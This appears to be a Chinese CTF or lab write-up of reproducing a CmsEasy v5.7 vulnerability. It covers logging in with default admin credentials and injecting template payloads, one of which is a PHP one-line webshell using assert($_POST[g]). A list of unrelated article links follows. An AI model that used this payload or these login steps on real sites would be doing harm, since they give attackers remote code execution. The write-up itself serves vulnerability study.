【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
还鮟1 小时前
CTF Web PHP弱类型与进制绕过(过滤)
php·ctf
sealaugh322 小时前
aws(学习笔记第四十八课) appsync-graphql-dynamodb
笔记·学习·aws
聚铭网络3 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
freexyn4 小时前
Matlab自学笔记六十一:快速上手解方程
数据结构·笔记·matlab
GLAB-Mary4 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
很小心的小新5 小时前
12、jvm运行期优化
java·开发语言·jvm·笔记
hanniuniu135 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly5 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全
时时三省6 小时前
【时时三省】vectorcast使用教程
安全·安全架构
寻丶幽风7 小时前
论文阅读笔记——NoPoSplat
论文阅读·笔记·三维重建·3dgs·相机位姿·dustr